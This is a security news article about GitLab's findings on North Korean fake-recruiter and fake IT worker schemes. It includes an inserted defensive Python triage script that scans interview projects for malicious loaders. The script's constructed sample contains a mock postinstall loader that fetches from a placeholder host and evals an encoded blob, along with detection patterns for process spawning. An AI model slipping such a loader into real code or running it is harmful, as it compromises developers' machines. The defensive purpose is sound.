Research from GitLab has exposed the latest tradecraft behind North Korean fake IT worker scams.

GitLab banned 131 North Korean-attributed accounts last year, most of which involved JavaScript repositories that acted as resources in the so-called Contagious Interview campaign.

In most cases, GitLab projects acted as obfuscated loaders for malware payloads — such as BeaverTail and Ottercookie — hosted outside the code repository platform.

Contagious Interview

The Contagious Interview campaign revolves around North Korean threat actors posing as recruiters or hiring managers in order to trick software developers into executing malicious code projects under the pretence of technical interviews.

Operators typically used consumer VPNs when interacting with GitLab, though some occasionally routed their access through dedicated virtual private server (VPS) infrastructure or laptop farms.

GitLab disrupted these operations by banning suspect repositories.

Opportunistic and broadly targeted

These suspect repositories were abused in a variety of illicit projects, split between targeting job-seeking programmers and supporting fake IT worker operations.

“Based on our visibility, malware operations targeting individual developers seeking employment are most common,” Oliver Smith, senior threat intelligence engineer at GitLab, told CSO. “Threat actors appear to have a preference for US-based developers and the fintech sector, but are opportunistic and target broadly.”

Smith continued: “For fake IT worker operations, threat actors commonly find employment at smaller organizations seeking contract software developers, particularly through freelancing platforms.”

Larger organizations are also being targeted by the ongoing scams, which started as early as 2019 and began in earnest in 2022.

Evolving tradecraft

Scammers’ tradecraft evolved last year through the use of malicious NPM dependencies, sandbox detection, and increasing reliance on invite-only private projects.
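The two points above that matter most to a developer handed a "take-home assignment" are that the repository itself is often only an obfuscated loader for a payload hosted elsewhere, and that the payload may be pulled in through a dependency or an install-time script rather than the visible application code. The following static triage script is an added example for this article, not GitLab's tooling or anything from the report; the heuristics it applies (install lifecycle hooks, dependencies resolved outside the public registry, dynamic code execution next to long base64-like literals, process spawning alongside network calls) are assumptions about what such loaders commonly look like, and the sample project it inspects is constructed inline to exercise each check.

```python
"""Static triage of a JavaScript project before anyone runs `npm install` on it.

Added defender-side example; not GitLab's code. The sample project and the
heuristics are constructed/assumed for illustration.
"""
import json
import re
from typing import Dict, List

# npm executes these scripts automatically during `npm install`, so a payload
# declared here runs before the candidate ever opens the source.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Dependency specs that bypass the public registry: git URLs, raw HTTP(S)
# tarballs, and local paths.
NON_REGISTRY_SPEC = re.compile(r"^(git\+|github:|https?://|file:|\.\./|\./)", re.I)

# Dynamic code execution primitives frequently seen in obfuscated loaders.
DYNAMIC_EXEC = re.compile(r"\b(eval|Function)\s*\(")
# A long base64-looking string literal (>=120 chars) is a common hiding place
# for a stage-two URL or an encoded payload.
BASE64_BLOB = re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]")
# Process spawning and outbound network calls in the same file.
SPAWN = re.compile(r"\b(child_process|exec|spawn|execSync)\b")
NETWORK = re.compile(r"\b(fetch|https?\.(get|request)|axios|XMLHttpRequest)\b")


def triage_project(files: Dict[str, str]) -> List[str]:
    """Return human-readable risk findings for a mapping of path -> file text."""
    findings: List[str] = []

    manifest = files.get("package.json")
    if manifest is not None:
        try:
            pkg = json.loads(manifest)
        except json.JSONDecodeError:
            findings.append("package.json: not valid JSON, inspect manually")
            pkg = {}
        for hook in LIFECYCLE_HOOKS:
            cmd = pkg.get("scripts", {}).get(hook)
            if cmd:
                findings.append(f"package.json: lifecycle hook '{hook}' runs on install: {cmd}")
        for section in ("dependencies", "devDependencies", "optionalDependencies"):
            for name, spec in pkg.get(section, {}).items():
                if NON_REGISTRY_SPEC.match(str(spec)):
                    findings.append(f"package.json: {section}.{name} resolves outside the registry: {spec}")

    for path, text in files.items():
        if not path.endswith((".js", ".mjs", ".cjs")):
            continue
        if DYNAMIC_EXEC.search(text) and BASE64_BLOB.search(text):
            findings.append(f"{path}: dynamic code execution combined with a long base64-like literal")
        if SPAWN.search(text) and NETWORK.search(text):
            findings.append(f"{path}: spawns processes and makes network calls in the same file")
    return findings


# Constructed sample "interview task"; the hostname is a placeholder, not a real IoC.
SAMPLE_PROJECT: Dict[str, str] = {
    "package.json": json.dumps({
        "name": "interview-task",
        "scripts": {"postinstall": "node setup.js", "test": "jest"},
        "dependencies": {
            "express": "^4.18.2",
            "helper-utils": "git+https://example.invalid/helper-utils.git",
        },
    }),
    "setup.js": (
        "const cp = require('child_process');\n"
        "const blob = '" + "QUJD" * 40 + "';\n"
        "fetch('https://example.invalid/config').then(r => r.text())"
        ".then(t => eval(Buffer.from(blob, 'base64').toString()));\n"
    ),
    "src/app.js": "const express = require('express');\nmodule.exports = express();\n",
}

if __name__ == "__main__":
    for finding in triage_project(SAMPLE_PROJECT):
        print(finding)
```

Running it against the constructed project reports the `postinstall` hook, the git-sourced dependency, and two findings on `setup.js`, while the ordinary Express module produces nothing. The checks are deliberately crude string heuristics: they raise the cost of the common loader pattern, but an unfamiliar project should still be installed only in a disposable sandbox, and repositories that demand a specific private dependency or an install-time script deserve a direct question to the "recruiter" before anything is executed.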

North Korean actors also relied more heavily on AI, both to develop custom obfuscators and to automate the creation of synthetic identities spun up to generate professional connections and contact leads at scale, GitLab explains in a technical blog post.

One IT worker controlled 21 unique personas, put together by adding their own image to stolen scans of US identity documents.

Some of the banned repositories contained personnel dossiers, passport scans, banking records from multiple Chinese banks, and structured quarterly performance spreadsheets.

Inside a fake IT worker boiler room

GitLab explains how one repository reveals detailed financial and personnel records for a likely Beijing-based North Korean IT worker cell that made more than $1.64 million between Q1 2022 and Q3 2025.

The eight-person cell of North Korean nationals pulled in revenue through freelance web and mobile software development while posing under false identities.

Earnings slipped last year but still exceeded $11K per member in Q3 2025, according to the group’s own records.

The private project also contained performance reviews for cell members, dated 2020. These performance reviews include comments about members’ earnings and skills development alongside remarks about contributions to household chores among the physically co-located team — including doing laundry, providing haircuts, and purchasing shared food and drink — as well as an assessment of “interpersonal values and adherence to party values.”

Another private code repository was abused by a North Korean fake IT worker likely operating from central Moscow. “The threat actor was focused on cultivation of a smaller group of more detailed personas and progressed from freelance work to full-time employment,” according to GitLab.

GitLab concludes that multiple DPRK teams are operating in parallel with limited coordination but similar tradecraft.

Weaponizing trust

Dray Agha, senior security operations manager at Huntress, said the managed detection and response services firm has observed similar tradecraft across 2025 and early 2026.

“North Korean threat actors are weaponizing the trust inherent in the tech recruitment process, tricking developers into executing malicious payloads under the guise of technical assessments,” Agha said. “By targeting highly privileged developers in lucrative sectors like cryptocurrency and finance, these actors are effectively bypassing traditional perimeter defences to establish immediate footholds.”

DPRK threat actors are adopting generative AI to scale their operations.

“From using AI tools to refine malware obfuscation and bypass security safeguards, to automating the creation of synthetic personas, North Korean groups are rapidly modernizing their tradecraft,” Agha noted. “This demonstrates that AI is actively lowering the barrier for threat actors to execute convincing, large-scale deception.”

Hannah Baumgaertner, head of research at Silobreaker, said that the overall methods deployed by North Korean fake IT worker groups have remained broadly similar though an “increase in the use of AI and other infection methods like ClickFix have been observed in the past year.”

“The types of platforms being abused as part of the scheme also appear to be expanding, with Visual Studio Code now also frequently used for initial access,” Baumgaertner added.

North Korean fake IT worker fraud is a cross-industry issue. GitLab hopes its detailed research, which includes more than 600 indicators of compromise associated with its case studies, will help defenders across the industry.

“We hope our report helps the entire industry strengthen defenses and contributes to more transparency around these threat actors’ tactics and operations,” GitLab’s Smith concluded.

An overview of the myriad tactics in play during North Korean fake IT worker scams — alongside advice on thwarting such scams — can be found in an earlier feature on the problem by CSO.
